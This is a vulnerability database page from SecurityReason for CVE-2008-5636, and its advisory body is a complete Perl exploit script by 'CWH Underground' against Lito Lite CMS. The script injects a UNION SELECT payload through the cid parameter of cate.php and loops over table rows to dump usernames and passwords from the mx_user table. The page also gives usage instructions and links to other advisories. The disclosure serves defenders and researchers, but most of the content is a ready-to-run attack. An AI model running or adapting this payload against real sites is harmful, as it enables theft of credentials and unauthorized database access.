|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4779 CVE : CVE-2008-5636 CWE : CWE-89 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : CWH Underground Published : 21.12.2008
Advisory Content : #!/usr/bin/perl -w #=========================================================== # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit #=========================================================== # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 29 November 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : Lito Lite CMS #DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip ###################################################### # #Note: magic_quotes_gpc = off # ########################################################################### ############ #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK ########################################################################### ############ use LWP::UserAgent; use HTTP::Request; if ($#ARGV+1 != 2) { print "\n==============================================\n"; print " Lito Lite Remote SQL Injection Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n"; print " \n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; print " \n"; print "Usage : ./xpl.pl <Target> <Data Limit>\n"; print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n"; exit(); } $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $number = $ARGV[1]; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; print "\n ..:: SQL Injection Exploit By CWH Underground ::.. "; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print "\n[+]Dump Username and Password\n"; for ($start=0;$start<$number;$start++) { $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20fro m%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; $res = $xpl->request($req); $info = $res->content; $count=$start+1; if ($info =~ /:::(.+):::/) { $dump=$1; ($username,$password)= split('::',$dump); printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; } else { print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; exit; } } References : http://www.milw0rm.com/exploits/7294
http://www.frsirt.com/english/advisories/2008/3300
http://secunia.com/advisories/32910  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |